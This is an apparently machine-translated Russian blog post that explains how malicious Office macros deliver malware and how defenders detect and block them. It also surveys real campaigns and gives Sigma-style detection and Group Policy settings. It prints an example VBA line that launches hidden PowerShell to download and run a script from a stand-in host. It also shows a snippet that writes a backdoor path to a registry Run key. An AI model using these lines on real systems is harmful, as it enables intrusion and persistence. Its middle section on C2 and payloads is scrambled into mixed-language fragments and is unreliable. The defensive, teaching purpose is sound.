Если вы когда-либо работали с Excel или Word, вы, вероятно, сталкивались с макросами — удобными маленькими скриптами, которые автоматизируют повторяющиеся задачи.
Но за их удобством скрывается серьезный вектор угроз, которым киберпреступники пользуются уже много лет.
Как макросы создают кибербезопасностьРиск?Если этот параметр включен, макросы могут выполнять скрытыекод в, казалось бы, безобидных документах.
Это позволяет злоумышленникам распространять вредоносное ПО, красть данные или даже брать под контроль целые системы, часто всего одним щелчком мыши ничего не подозревающего пользователя.
Макросы представляют угрозу кибербезопасности, поскольку их можно использовать для выполнения вредоносного кода, когда пользователи открывают зараженные файлы Office. Это позволяет злоумышленникам обойти традиционную защиту и получить несанкционированный доступ к системам.
В этом блоге мы подробно объясним, как макросы используются во время реальных кибератак, какие типы вредоносных программ обычно передаются через документы с поддержкой макросов, а также какие шаги можно предпринять, чтобы оставаться защищенными.
Что такое макросы в Microsoft Office?

Макросы в Microsoft Officeпредставляют собой автоматизированные последовательности инструкций, которые помогают пользователям более эффективно выполнять повторяющиеся задачи.
Обычно пишетсяVisual Basic для приложений (VBA)Макросы используются в таких приложениях, как Excel, Word и Outlook, для экономии времени и повышения производительности за счет автоматизации таких действий, как форматирование ячеек, создание отчетов или отправка электронных писем.
Например, вместо того, чтобы вручную применять формулы к тысячам строк Excel, пользователь может запустить макрос и сделать это мгновенно одним щелчком мыши.
Но как макросы создаюткибербезопасностьриск? Их способность выполнять код делает их любимым инструментом злоумышленников, особенно когда пользователи по незнанию включают вредоносные макросы в фишинговые документы.
Как работ��ют макросы в файлах Office?
Макрос — это, по сути, небольшая программа, встроенная в документ. Когда пользователь открывает файл, содержащий макрос, например файл .xlsm, .docm или .pptm, и выбираетвключить контент, макрокод выполняется.
Это может быть невероятно полезно в корпоративных средах, где автоматизация отчетов, расчетов или рабочих процессов является обычным явлением.
Офисные приложения предоставляютВкладка «Разработчик», который пользователи могут включить для:
- Запись макросов без кодирования
- Напишите или отредактируйте код VBA.
- Назначайте макросы кнопкам или ярлыкам.
Типы файлов, которые обычно содержат макросы
- .xlsm– Книга Excel с поддержкой макросов
- .документ– Документ Word с поддержкой макросов
- .pptm– Презентация PowerPoint с поддержкой макросов
- .xlam– Надстройка Excel с макросами
Эти файлы отличаются от своих стандартных аналогов (.xlsx, .docx и т. д.), поскольку позволяют выполнять встроенный код.
Подробнее:Что такое GRC в кибербезопасности? Все, что вам следует знать
Почему макросы могут быть опасны?
Хотя макросы служат полезным целям, они также вводяткибербезопасностьриски. Поскольку макросы могут выполнять команды системного уровня, злоумышленники часто используют их для запускавредоносные полезные нагрузкикогда ничего не подозревающие пользователи включают содержимое зараженных документов, обычно доставляемых через фишинговые электронные письма.
Подробнее:Кибербезопасность против разработки программного обеспечения: кодировать или защищать?
Почему макросы являются популярным вектором атак?

Киберпре��тупники широко злоупотребляют макросами, поскольку они предлагают надежную встроенную функцию автоматизации в Microsoft Office, которой можно манипулировать для выполнения вредоносного кода, часто не вызывая немедленных подозрений.
Их интеграция с бизнес-процессами и привычками пользователей делает их идеальным инструментом для доставки вредоносного ПО, что является основной причинойкак макросы создаюткибербезопасностьрисккак в личной, так и в корпоративной среде
1. Макросы запускают код на системном уровне
Макросы, написанные наVisual Basic для приложений (VBA), может выполнять команды системного уровня, если включено. Это означает, что злоумышленники могут:
- Загру��ите и запустите вредоносные исполняемые файлы
- Изменить настройки реестра
- Отключить антивирусную защиту
- Создать механизмы сохранения
Эта возможность превращает простой файл Word или Excel в пульт дистанционного управления для взлома системы.
Подробнее:Как заблокировать излучение Wi-Fi роутера?
2. Идеальн�� подходит для фишинга и социальной инженерии
Злоумышленники обычно прикрепляют к фишинговым электронным письмам документы с поддержкой макросов, замаскированные под:
- Счета-фактуры
- Резюме отдела кадров
- Налоговые формы
- Листы отслеживания отправлений
В электронном письме может быть указано:
"Этот документ защищен. Нажмите «Включить контент», чтобы просмотреть».
Как только пользователь нажимаетВключить контент, встроенный макрос автоматически запускает выполнение вредоносного ПО.
Подробнее:Что такое травля в кибербезопасности? Не поддавайтесь этому
3. Макросы обходят многие традиционные меры безопасности
Поскольку макросы представляют собойзаконная функция Office, они часто:
- Обход антивирусных инструментов на основе сигнатур
- Проходите через спам-фильтры, если они хорошо продуманы
- Оставайтесь незамеченными в среде песочницы, если запутать
Злоумышленники также могут использоватьзакодированные сценарии VBAилибезфайловые методы, что еще больше затрудняет обнаружение.
Подробнее:Как создать автономную компанию по кибербезопасности
4. Макросы не требуют использования уязвимостей
В отличие от атак нулевого дня или сложных эксплойтов, атаки на основе макросов не полагаются на недостатки системы. Вместо этого они используютдоверие пользователя.
Этоснижает технический барьердля киберпреступников, одновременно увеличивая вероятность успеха.
Подробнее:Кибербезопасность перенасыщена? Руководство по карьере внутри
5. Широкое использование на предприятиях
Поскольку макросы настолько распространены в корпоративной среде (для автоматизации отчетов Excel, составления финансовых отчетов и т. д.), многие организации:
- Разрешить использование макросов по умолчанию
- Не удалось должным образом ограничить политику выполнения макросов
- Отсутствие информации о том, какие документы запускают макросы
Это создает идеальный шторм: высокая уязвимость + низкий контроль = возможность вектора атаки.
Подробнее:Сколько времени нужно, чтобы изучить кибербезопасность без опыта?
Почему макросы являются популярным вектором атак
Киберпреступники широко злоупотребляют макросами, поскольку они предлагаютнадежная встроенная функция автоматизациив Microsoft Office это может бытьманипулировали для выполнения вредоносного кода, часто не вызывая непосредственных подозрений. Их интеграция с бизнес-процессами и привычками пользователей делает их идеальным инструментом для доставки вредоносного ПО.
1. Макросы запускают код на системном уровне
Макросы, написанные наVisual Basic для приложений (VBA), может выполнять команды системного уровня, если включено. Это означает, что злоум��шленники могут:
- Загрузите и запустите вредоносные исполняемые файлы
- Изменить настройки реестра
- Отключить антивирусную защиту
- Создать механизмы сохранения
Эта возможность превращает простой файл Word или Excel в пульт дистанционного управления для взлома системы.
Подробнее:Поисковая система свечей: молниеносный частный поиск
2. Идеально подходит для фишинга и социальной инженерии
Злоумышленники обычно прикрепляют к фишинговым электронным письмам документы с поддержкой макросов, замаскированные под:
- Счета-фактуры
- Резюме отдела кадров
- Налоговые формы
- Листы отслеживания отправлений
В электронном письме может быть указано:
"Этот документ защищен. Нажмите «Включить контент», чтобы просмотреть».
Как только пользователь нажимаетВключить контент, встроенный макрос автоматически запускает выполнение вредоносного ПО.
Подробнее:Кибербезопасность или веб-разработка: что лучше?
3. Макросы обходят многие традиционные меры безопасности
Поскольку макросы представляют собойзаконная функция Office, они часто:
- Обход антивирусных инструментов на основе сигнатур
- Проходите через спам-фильтры, если они хорошо продуманы
- Оставайтесь незамеченными в изолированных средах, если запутались
Злоумышленники также могут использоватьзакодированные сценарии VBAилибезфайловые методы, что еще больше затрудняет обнаружение.
Подробнее:Как предотвратить вирусы и ��редоносный код?
4. Макросы не требуют использования уязвимостей
В отличие от атак нулевого дня или сложных эксплойтов, атаки на основе макросов не полагаются на недостатки системы. Вместо этого они используютдоверие пользователя.
Этоснижает технический барьердля киберпреступников, одновременно увеличивая вероятность успеха.
Подробнее:Инкогнито против VPN: что лучше защищает вашу конфиденциальность?
5. Широкое использование на предприятиях.
Поскольку макросы настолько распространены в корпоративной среде (для автоматизации отчетов Excel, составления финансовых отчетов и т. д.), многие организации:
- Разрешить использование макросов по умолчанию
- Не удалось должным образом ограничить политику выполнения макросов
- Отсутствие информации о том, какие документы запускают макросы
Это создает идеальный шторм: высокая уязвимость + низкий контроль = возможность вектора атаки.
Подробнее:Что такое CSAM в кибербезопасности? Все, что вам нужно знать
Реальные примеры атак на основе макросов
Как макросы представляют угрозу кибербезопасности?Атаки на основе макросов не являются теоретическими; они использовались в некоторых из наиболее разрушительных и широко распространенных киберинцидентов в новейшей истории.
Злоумышленники отдают предпочтение макросам из-за их надежности, охвата и простоты использования в ходе фишинговых кампаний. Давайте посмотрим на некоторые примечательные примеры из реальной жизни, где вредоносные макросы играли центральную роль.
1. Кампании Emotet по вредоносному ПО
Эмотет, одно из самых известных семейств вредоносных программ, в значительной степени полагалось на документы Word с поддержкой макросов. Эти документы, доставленные через фишинговые электронные письма, которые выглядели как счета или напоминания об оплате, обманным путем заставляли пользователей включать макросы. После включения:
- Emotet загружался с сервера управления и контроля
- Он выступал в качестве загрузчика для других вредоносных программ, таких какТрикБотиПрограмма-вымогатель Ryuk
- Распространяется по сетям, что приводит к массовым нарушениям
Влияние:Затронутые финансовые учреждения, правительственные учреждения и поставщики медицинских услуг по всему миру, прежде чем они были нарушенызаконисполнение в 2021 году.
Подробнее:Глубокая поисковая система: исследуйте возможности Google
2. Банковский троян Dridex
The Драйдекстроян использовал файлы Excel с макросами для кражи банковских учетных данных:
- Фишинговые электронные письма, выдаваемые за уведомления о доставке или счета-фактуры
- Пользователи, включившие макросы, по незнанию выполнили код VBA
- Dridex внедрил вредоносный код в процессы браузера для перехвата банковских входов в систему в режиме реального времени
Влияние:Это стало причиной финансовых махинаций на миллионы и было связано с организованными группировками киберпреступников в Восточной Европе.
3. APT28 (Fancy Bear) – Политический шпионаж
АПТ28, связанная с российским государством группа угроз, использовала документы с поддержкой макросов во времяшпионские кампании, связанные с выборами. В одном примере:
- Они р��ссылали фишинговые электронные письма политическим деятелям с прикрепленными к ним документами Word
- Макросы после включения загружаютсяSeduploader, вредоносная программа, используемая для разведки
- Получил постоянный доступ к конфиденциальным сообщениям
Влияние:Используется вВмешательство в выборы в С��А,НАТО нацеливаетсяигосударственное наблюдение.
Подробнее:Clearnet и Darknet: объяснение ключевых различий
4. Фишинговые кампании в связи с COVID-19 (2020 г.)
В первые дни пандемии злоумышленники воспользовались общественным страхом, отправив:
- Документы на тему ВОЗ и под брендом департамента здравоохранения
- Макросы внутри этих документов выполняютсяинфокрадыиинструменты удаленного доступа (RAT)
Влияние:Широкое распространение инфекций, нацеленных на удаленных работников, больницы и г��сударственные учреждения во время карантина.
5. NotPetya (Теория начальных векторов)
ХотяНеПетячервь-вымогатель в основном распространялся через компрометацию цепочки поставок,в ранних отчетах предполагалосьчто файлы Excel с макросами могли использоваться для первоначального закрепления на определенных конечных точках, особенно в Украине.
| Название атаки | Исполнитель угрозы/вредоносное ПО | Способ доставки | Результат полезной нагрузки макроса | Воздействие |
|---|---|---|---|---|
| Кампании Emotet | Загрузчик Emotet + TrickBot | Документы Word в фишинговых письмах | Возможные документы Excel на ранней стадии | Глобальное влияние на финансы, здравоохранение и правительства |
| Троян Dridex | Банковское вредоносное ПО Dridex | Документы Excel/Word как поддельные счета | Внедрение браузера, кража банковских учетных данных | Миллионы потеряны в результате банковского мошенничества |
| APT28 Шпионаж | Fancy Bear / Seduploader | Целевой фишинг в адрес политических деятелей | Разведка и установка бэкдора | Выборы в США, НАТО и политические цели поставлены под угрозу |
| Мошенничество с COVID-19 | Инфокрады, КРЫСЫ | Фишинг на тему здоровья с ��спользованием документов Office | Удаленный доступ, утечка данных | Всплеск атак на удаленных работников и больницы в 2020 году |
| НеПетя (теоретически) | Червь-вымогатель NotPetya | Возможные документы Excel на ранней стадии | Первоначальная точка опоры в цепочке поставок | Массовые сбои по всей Украине, Maersk, FedEx и т. д. |
Что происходит, когда включен вредоносный макрос?

Когда пользователь включает вредоносный макрос внутри документа Office, он срабатываетVBA (Visual Basic для приложений)выполнение кода в доверенном контексте Microsoft Office.
КакПредставляют ли макросы угрозу кибербезопасности? Используя это доверие для скрытной доставки безфайловой полезной нагрузки, можно добиться устойчивости и установить контроль над системами, зачастую без немедленного поднятия тревоги. Вот техническое описание того, что происходит, шаг за шагом:
Шаг 1. Инициализация макроса через среду выполнения VBA
Как только пользователь нажимает«Включить контент»,приложение Office передает управлениеСреда выполнения VBA, который начинает выполнение встроенного кода внутри документа.
- Макрос можно запустить автоматически, используяпроцедуры, управляемые событиями, например:
- AutoOpen() → срабатывает при открытии документа (Word)
- Workbook_Open() → срабатывает при открытии Excel
- Document_Open() → встроен в шаблон (.dotm)
- AutoOpen() → срабатывает при открытии документа (Word)
Эти процедуры устраняют нужнодля взаимодействия с пользователем после включения макросов.
Шаг 2. Доставка полезной нагрузки с помощью двоичных файлов Living-Off-the-Land (LOLBins)
Современныймакроатакиредко удаляют двоичные файлы напрямую.Вместо этого они злоупотребляют встроенными средствами Windowsинструменты to скрытно загружать и выполнять полезную нагрузку.Общие примеры включают:
| LOLBins Используемые | Цель |
| PowerShell.exe | Загрузка полезных данных, выполнение запутанных команд |
| mshta.exe | Выполнение удаленного приложения JavaScript/HTML |
| certutil.exe | Получить вредоносное ПО в кодировке Base64 из Интернета |
| regsvr32.exe | Запуск вредоносных скриптов через COM-скриптлеты |
| rundll32.exe | Загрузка и запуск полезных данных DLL |
Пример фрагмента VBA:
Shell «powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command «»IEX(New-Object Net.WebClient).DownloadString('http://malicious.site/payload.ps1') «»
Эти процессы обычнопорождаются приложениями Officeтакими как winword.exe или excel.exe, что является красным флагом в EDR/XDR.
Шаг 3: Механизмы сохранения
Макросы могут обеспечивать сохранение с помощью:
- Ключи реестра:HKCU\Software\Microsoft\Windows\CurrentVersion\Run
- Создано с помощью schtasks.exe через папки запуска, выполняемые макросом: Created using schtasks.exe via macro-executed PowerShell
- Set objShell = CreateObject("WScript.Shell")objShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Backdoor", "C:\Users\Victim\AppData\backdoor.exe", "REG_SZ"
Шаг 4: Связь управления и контроля (C2)
deployed, it may:
Beacon to a remote C2 server
over HTTP, HTTPS, or DNS
Use custom headers
- orbase64-encoded payloads
- to avoid detectionDeploy techniques likedomain frontingor use
- bulletproof hostingSome macros use encrypted strings or string obfuscation in VBA to hide C2 URLs and evade static detection.Шаг 5: Окончательное выполнение полезной нагрузкиПолезные нагрузки на финальном этапе различаются в зависимости от целей злоумышленника:
Программы-вымогатели:
Зашифруйте файлы и отобразите сообщение о выкупе
Инфокрады:
- Захват сохраненных учетных данных браузера, содержимого буфера обмена, файлов cookieRAT:
- Включение слежения в режиме реального времени, запись данных с экранаprocdump.exe or mimikatz
- Detection Footprint (Technical Artifacts)Artifact
- What to MonitorOffice spawning PowerShell
winword.exe → powershell.exe
| Suspicious registry edits | REG ADD in logs |
| Network traffic to unknown domains | Use threat intel feeds to correlate |
| File drops in AppData, Temp | Especially .dll, .ps1, .vbs |
| SIEMs can write | detection rules |
| around Office process trees, script execution anomalies, and registry persistence | activity |
.To avoid detection, attackers often:Bonus: Obfuscation TechniqueSplit VBA strings using Chr() or base64Use encoded PowerShell payloads
Dynamically download shellcode to memory (бесфайловое вредоносное ПО)
Типы вредоносных программ, распространяемых через макросы
- Макросы уже давно используются злоумышленниками в качестве начальных векторов доступа
- , особенно потому, что они могут выполнять произвольный код в контексте доверенных приложений Microsoft Office
- Как макросы представляют угрозу кибербезопасности?
Types of Malware Delivered via Macros
Macros have long been exploited by attackers as initial access vectors, especially because they can execute arbitrary code within the context of trusted Microsoft Office applications.
How Do Macros Pose A Cybersecurity Risk?Выступая в качестве стартовой площадки для передовых вредоносных программ, позволяя злоумышленникам обходить защиту конечных точек и незаметно компрометировать системы.
Как только пользователь включает макросы во вредоносном документе, злоумышленники могут доставить широкий спектр вредоносных программ, от программ-вымогателей и банковских троянов до скрытых бесфайловых вредоносных программ.
Ниже приведено технически подробное объяснение наиболее распространенных типов вредоносных программ, доставляемых через вредоносные макросы, включая поток выполнения,варианты использованияи примечательные примеры.
1. Программы-вымогатели
Описание:
Программа-вымогатель шифрует файлы пользователя и требует оплату (обычно в криптовалюте) за восстановление доступа. Он также может включатьдвойное вымогательство, где данные удаляются перед шифрованием.
Как используются макросы:
- Макрос запускаетPowerShellили команду cmd.exe для загрузки полезной нагрузки программы-вымогателя.
- Он может использоватьБинарные файлы, живущие за счет земли (LOLBins)например, bitsadmin или certutil для получения зашифрованных или запутанных двоичных файлов.
- Полезные нагрузки выполняются с помощью rundll32.exe, часто внедряясь в законные процессы.
Пример из реальной жизни:
- Рюк,ЛокбитиЛабиринтвсе они были обнаружены в результате фишинговых атак на основе макросов, которым часто предшествовали заражения Emotet и TrickBot.
Технические индикаторы:
- Офис → PowerShell → Программа-вымогатель EXE
- Были созд��ны расширения файлов, такие как .ryk, .lockbit
- Подключения C2 к скрытым сервисам TOR
2. Трояны удаленного доступа (RAT)
Описание:
RAT обеспечивают полный удаленный доступ к скомпрометированной системе и могут выполнять произвольные команды, записывать нажатия клавиш, делать снимки экрана или даже активировать веб-камеры и микрофоны.
Схема макроатаки:
- Макрос удаляет или загружает запутанныйДвоичный файл RAT, часто замаскированный под .dll или .txt
- Регистрирует RAT вЗапуск HKCUключ реестра или запланированное задание
- Сохраняет постоянство в реестре или папках автозагрузки
��бщие RAT, доставляемые через макросы:
- Квазар КРЫСА
- Наноядро
- Агент Тесла
- ДаркКомета
Технические индикаторы:
- Приложение Office → regsvr32.exe → выполнение DLL
- Обратная оболочка TCP, инициированная через скрытую оболочку PowerShell
- Поведение маяка для доменов динамического DNS (DDNS)
3. Банковские трояны
Описание:
Банковские трояны — это специализированные вредоносные программы, которые отслеживают сеансы браузера с целью кражи учетных данных с финансовых платформ.
Схема макроатаки:
- МакротриггерыPowerShell или MSHTAз��грузить вредоносное ПО, такое как Dridex, Ursnif или TrickBot
- Внедряется в процессы браузера (например, chrome.exe, iexplore.exe)
- Используетзахват формы,«Человек в браузере» (MitB), илисетьвводитдля сбора данных
Пример:
- Драйдекспри доставке через вредоносные вложения Excel использовались запутанные макросы VBA и кодировка XOR, чтобы избежать обнаружения.
Технические индикаторы:
- Неожиданные библиотеки DLL, загруженные в chrome.exe
- Зашифрованный трафик на поддельные банковские домены
- Модифицированные библиотеки браузера или прокси
4. Информационные кражи
Описание:
Инфокрады молча собирают данные из системы жертвы, включая учетные данные для входа, историю браузера, файлы cookie, содержимое буфера обмена, сохраненную информацию о кредитной карте и даже криптовалютные кошельки.
Использование макроса:
- Макрос VBA выполняет сценарийзагрузить и запустить полезные данные EXEво временном каталоге
- Полезная нагрузка сканирует локальное хранилище для получения учетных данных и отправляет через HTTP POST
- Часто включаетанти-ВМ,анти-песочницаианти-отладкаметоды
Популярные инфостеры:
- Книга форм
- РедЛайн
- Видар
- ЛокиБот
Технические индикаторы:
- Сетевой трафик с запросами POST в кодировке Base64
- Собранные данные заархивированы и отправлены на сервер C2
- Сохранение с помощью запланированных задач и ключей реестра
5. Бесфайловое вредоносное ПО
Описание:
В отличие от традиционных вредоносных программ, бесфайловые вредоносные программы полностью находятся в памяти. Он избегает записи чего-либо на диск, что делает егочрезвычайно скрытныйи антивирусному программному обеспечению труднее обнаружить.
Выполнение макроса:
- Макрос VBA запускает запутанныйОднострочный PowerShell
- Код внедряет шеллкод или полезную нагрузку непосредственно в память с помощью Invoke-Expression (IEX)
- Использует такие инструменты, какЗагрузчик пончиков,Отражающее внедрение DLL, илиИмперия PowerShell
Пример:
- АПТ29иФИН7группы использовали макросы для развертывания бесфайлового вредоносного ПО для шпионажа и горизонтального перемещения внутри корпоративных сетей.
Технические индикаторы:
- PowerShell запускается из winword.exe или excel.exe
- На диск не записываются двоичные файлы
- Анализ памяти выявил внедренный шеллкод в законные процессы
6. Загрузчики и за��рузчики
Описание:
Это легковесные программы, единственная задача которых —загрузить и запустить вторичное вредоносное ПО, обычно используется в многоэтапных атаках.
Как задействованы макросы:
- Макросы удаляют скрипты-загрузчики, такие какGootLoader,ZLoader, илиДымовой загрузчик
- Загрузчик подключается к C2, извлекает зашифрованные или полиморфные полезные данные
- Вредоносное ПО следующего этапа исполняется динамически, часто с внедрением процесса
Технические индикаторы:
- Исходный документ Office имеет минимальный размер
- Присутствует скриптовая логика задержки или обхода песочницы
- Поведение полезной нагрузки второго этапа зависит от времени, географического положения или языка
| Тип вредоносного ПО | Основная цель | Доставляется через макрос с использованием | Ключевые модели поведения | Яркие примеры | Сложность обнаружения |
| Программы-вымогатели | Зашифровать файлы с целью получения выкупа | PowerShell/certutil/LOLBins | Шифрует локальные и сетевые файлы, отправляет записку о выкупе | Рюк, ЛокБит, Мейз | ⚠️ Средний |
| Троян удаленного доступа (RAT) | Полное дистанционное управление | Удаление VBScript/DLL/сохранение реестра | Удаление VBScript/DLL/сохранение реестра | NanoCore, Агент Тесла, Квазар | ✅ Высокий |
| Банковский троян | Украсть банковские учетные данные | Office VBA → PowerShell → EXE | Внедрение через браузер, веб-инъекция, захват формы | Драйдекс, Урсниф, TrickBot | ✅ Высокий |
| Инфокрад | Удалить учетные данные и данные сеанса | Запутанные скрипты и загрузка полезной нагрузки | Крадет пароли, файлы cookie, данные буфера обмена, файлы криптокошелька | RedLine, Видар, FormBook | ✅ Высокий |
| Бесфайловое вредоносное ПО | Скрытое выполнение в памяти | Однострочники PowerShell (IEX) | Рефлексивное внедрение DLL, отсутствие активности диска, обход традиционного AV | Инструменты FIN7, Empire | ✅ ✅Очень высокий |
| Загрузчик/Загрузчик | Доставить полезную нагрузку втор��й ступени | Макрос → маленькая заглушка → выборка C2 | Загрузка и запуск полезных данных, обход песочницы, настройка постоянства | GootLoader, ZLoader | ✅ Высокий |
Как обнаружить атаки на основе макросов
Для обнаружения атак на основе макросов требуется комбинациявидимость конечной точки,анализ журналовимониторинг поведения пользователей.
Поскольку макросы используютзаконный офисфункциии может выполнитьскрытые скрипты, традиционные антивирусные решения часто их пропускают. Ниже приведены эффективные методы и инструменты, которые синие команды и аналитики SOC используют для обнаружения вредоносной активности макросов.
1. Мониторинг подозрительных деревьев родительских и дочерних процессов
Вредоносные макросы обычно вызываютаномальное поведение процессов, порождающее, например:
- WINWORD.EXE → POWERSHELL.EXE
- EXCEL.EXE → CMD.EXE → BITSADMIN.EXE
- OUTLOOK.EXE → MSHTA.EXE
ИспользуйтеЭДРтакие инструменты, какЗащитник Microsoft для конечной точки,Краудстрайк, илиСентинелУандля оповещения о необычных цепочках процессов, связанных с приложениями Office.
2. Примеры правил SIEM для обнаружения на основе макросов
Вот простойЛогика в стиле правил Сигмыдля обнаружения выполнения макроса через PowerShell:
title: Создание приложений Office PowerShell
источник журнала:
категория: создание_процесса
продукт: Windows
обнаружение:
выбор:
ParentImage|содержит:
– «winword.exe»
– «excel.exe»
– «powerpnt.exe»
Изображение|оканчивается на: «powershell.exe»
условие: выбор
Интегрируйтесь в SIEM, напримерСпланк,Эластичный (ЭЛК), илиMicrosoft Сентинел.
3. Мониторинг реестра и артефактов файловой системы
Вредоносные макросы часто создаютмеханизмы сохранениянапример:
- Пути реестра:
- HKCU\Software\Microsoft\Windows\CurrentVersion\Run
- HKCU\Software\Microsoft\Office\<версия>\Word\Security
- HKCU\Software\Microsoft\Windows\CurrentVersion\Run
- Переброшенные файлы:
- %APPDATA%, %TEMP% или папки автозагрузки
- Файлы .vbs, .ps1, .lnk
- %APPDATA%, %TEMP% или папки автозагрузки
ИспользуйтеСисмониВазуилиВелоцираптордля отслеживания изменений реестра и удаленных файлов.
4. Обнаружение подозрительного поведения сети
Макросы часто:
- ИнициироватьHTTP/HTTPS-запросыв неизвестные домены
- Маяк дляКомандование и управление (C2)серверы
- Используйте небраузерные пользовательские агенты, такие как Microsoft Office Word 12.0
Такие инструменты, какЗик,Сурикатаили вашNGFW (межсетевой экран следующего поколения)может обнаружить эти аномалии.
ИнтегрироватьЛенты данных об угрозахкоррелировать исходящий трафик.
5. Поведенческая песочница
Используйте инструменты динамического анализа для уничтожения документов Office всреды песочницы(например,Joe Sandbox,Any.Run,Гибридный анализ). Эти инструменты показывают:
- Выполнение макроса VBA
- Ком��нды PowerShell
- Запись файлов и сетевая активность
- Попытки обойти песочницу с помощью задержек или проверок среды
6. Обнаружение аномалий на основе пользователей
Отслеживайте аномалии в поведении пользователей, такие как:
- Пользователь, не являющийся администратором, внезапно запускает PowerShell через Word
- Повторное включение макросов из внешних документов
- Доступ к конфиденциальным файлам вскоре после открытия документов с поддержкой макросов
ИспользуйтеУЭБА(Аналитика поведения пользователей и объектов) для корреляции аномалий на основе макросов с оценкой рисков пользователей.
Рекомендуемые инструменты обнаружения:
| Инструмент | Вариант использования |
| Стек Sysmon + ELK | Низкоуровневая телеметрия + корреляция журналов |
| Microsoft Defender ATP | Обнаружение конечных точек + сканирование памяти |
| Велоцираптор | Криминалистический мониторинг конечных точек (с открытым исходным кодом) |
| Правила Сигмы | Логика обнаружения на основе SIEM |
| Зик + Суриката | Обнаружение макросов на сетевом уровне |
| Песочница CAPE / Any.Run | Документирование детонации и отслеживание полезной нагрузки |
Совет: Объедините слои телеметрии
Чтобы повысить уверенность обнаружения:
- Коррелироватьжурналы создания процессов+реестр пишет+DNS-запросы
- ОповещениеДочерние процессы Office,PowerShell с запутанными аргументами, илинебраузерный веб-трафик
Как макросы представляют угрозу кибербезопасности в организациях?

В корпоративной среде макросы обычно используются для автоматизации рутинных задач в сфере финансов, управления персоналом, операций и функций цепочки поставок.
Однако эта законная функциональность часто таит в себе скрытую угрозу.Как макросы представляют угрозу кибербезопасности?
При неправильном использовании они могут служить скрытымканалдля доставки вредоносного ПО, создавая опасное сочетание удобства и уязвимости.
Ниже приведены ключевые макросы рисков кибербезопасности, которые представляют собой конкретно организации и корпоративные сети.
1. Макросы используют доверие во внутренних рабочих процессах
Сотрудники часто получают документы через:
- Внутренняя переадресация электронной почты
- Общие сетевые диски
- Платформы для совместной работы, такие как Teams или SharePoint
Злоумышленники используют это доверие следующим образом:
- Внедрение вред��носных макросов в документы, которые кажутся исходящими от внутренних пользователей или деловых партнеров
- Использованиеинъекция шаблонаилиподмена контентаобойти элементарную проверку
Один щелчок по «Включить контент» может поставить под угрозу все бизнес-подразделение.
2. Макросы обеспечивают горизонтальное перемещение по сети
После первоначального компромисса:
- Злоумышленник может использоватьСкрипты PowerShellилисброс учетных данныхинструменты, предоставляемые макросом
- Использовать скомпрометированные учетные записи для горизонтального перемещения (например, от финансов к ИТ-системам)
- Используйте инструменты удаленного выполнения (например, PsExec, WMI) для распространения полезных данных
Во многих случаях использования программ-вымогателей исходной точкой заражения является документ с поддержкой макросов, отправленный пользователю с низким уровнем привилегий.
3. Макросы нацелены на важные отделы
Макросы часто используются для атак на отделы, которые:
- Обработка конфиденциальных данных(HR, право, финансы)
- Иметь доступ к платежным системамили внутренние базы данных
- Часто открываемые внешние документыот поставщиков или клиентов
Пример: поддельный счет-фактура с макросом, который заражает команду по работе с кредиторской задолженностью, может привест�� к финансовому мошенничеству или манипуляциям с банковскими переводами.
4. Многие организации не блокируют макросы по умолчанию
Даже сегодня:
- Многие среды Microsoft 365 все ещеразрешить использование макросов в доверенных документах
- Объекты групповой политики (GPO) часто неправильно настроены или устарели
- Макросы из облачных ресурсов или вложений электронной почты остаются исполняемыми
Этот пробел в макроуправлении создаетнизкобарьерная точка входа для злоумышленников.
5. Макросы могут обойти меры безопасности предприятия
Сложные вредоносные макросы часто используют:
- Запутывание(например, разделение строк, кодирование Chr())
- Техники жизни за счет земли(PowerShell, mshta, certutil)
- Бесфайловые полезные нагрузкикоторые живут в памяти
Такое поведение:
- Обход традиционного антивируса (AV)
- Оставайтесь незамеченными устаревшими системами обнаружения вторжений (IDS)
- Использование неконтролируемого поведения приложений Office
6. Соблюдение требований и юридические риски
Взлом, вызванный макросом, может подвергнуть организацию:
- Нарушения GDPR, HIPAA или PCI-DSSесли конфиденциальные данные скомпрометированы
- Юридические последствия неправильного обращения с данными
- Потеря доверия клиентов и деловой репутации
7. Трудно обучить нет��хнических пользователей
Макросы требуют от конечных пользователей принятия решений об их включении или блокировке. В крупных организациях:
- Осведомленность о безопасности непоследовательна
- Сотрудники могут включить контент по привычке
- Злоумышленники используют такие фразы социальной инженерии, как:
«Включите контент для правильного просмотра документа».
Практический пример:
В многонациональной логистической компании счет-фактура Excel с поддержкой макросов заразил одну конечную точку. В течение нескольких часов злоумышленники переместились в сторону, используя украденные учетные данные AD, и развернули программы-вымогатели в более чем 700 системах.
Как предотвратить макроатаки: лучш��е практики

В корпоративных средах полный запрет макросов может быть непрактичным из-за законных вариантов использования в бизнесе. Вместо этого организации должны принятьмногоуровневая стратегия защитыэто балансирует удобство использования и безопасность.
Ниже приведено подробное руководство по техническому предотвращению атак на основе ма��росов без нарушения рабочих процессов.
1. Блокировка макросов в файлах из Интернета (MotW Control)
Microsoft представила в приложениях Office функцию блокировки макросов в документахпомечено как загруженное из Интернетас помощьюЗнак Интернета (MotW)атрибут. Это останавливаетнаиболее распространенный вектор атаки: фишинговые вложения и загрузки.
Как включить:
ИспользуйтеГрупповая политикаили Microsoft Intune:
Путь: Конфигурация пользователя → Шаблоны администратора → Microsoft Office [версия] → Настройки безопасности → Центр управления безопасностью
Настройка: блокировать запуск макросов в файлах Office из Интернета → Включено
- Применяется к .docm, .xlsm, .pptm, .xlam
Преимущество: блокирует макросы в файлах с помощью MotW (Zone.Identifier), не затрагивая внутренние рабочие процессы макросов.
2. Отключите все макросы с помощью групповой политики
Для высокозащищенных сред, г��е макросы не требуются, полностьюотключение функциональности макросовэто лучший вариант.
Конфигурация:
Путь к объекту групповой политики:
Конфигурация пользователя → Шаблоны администратора → Microsoft Office → Настройки безопасности → Настройки уведомлений о макросах VBA
- Рекомендуемая настр��йка:
«Отключить все макросы без уведомления».
Это предотвращает выполнение макросаполностью, в том числе из подписанных документов, предлагающихмаксимальная защита.
Используйте в SOC, юридических отделах и конечных точках руководителей, где использование макросов не является частью рутинных задач.
3. Включение и принудительное использование защищенного просмотра
Защищенный просмотроткрывает потенциально опасные файлы Office визолированный контейнер только для чтения, запрещая выполнение любого макроса до тех пор, пока ему явно не ��удет предоставлено доверие.
Как включить:
Перейти к:
- Файл → Параметры → Центр управления безопасностью → Настройки центра управления безопасностью → Защищенный просмотр
- Включите все флажки:
- «Включить защищенный просмотр для файлов из Интернета»
- «Включить защищенный просмотр для вложений Outlook»
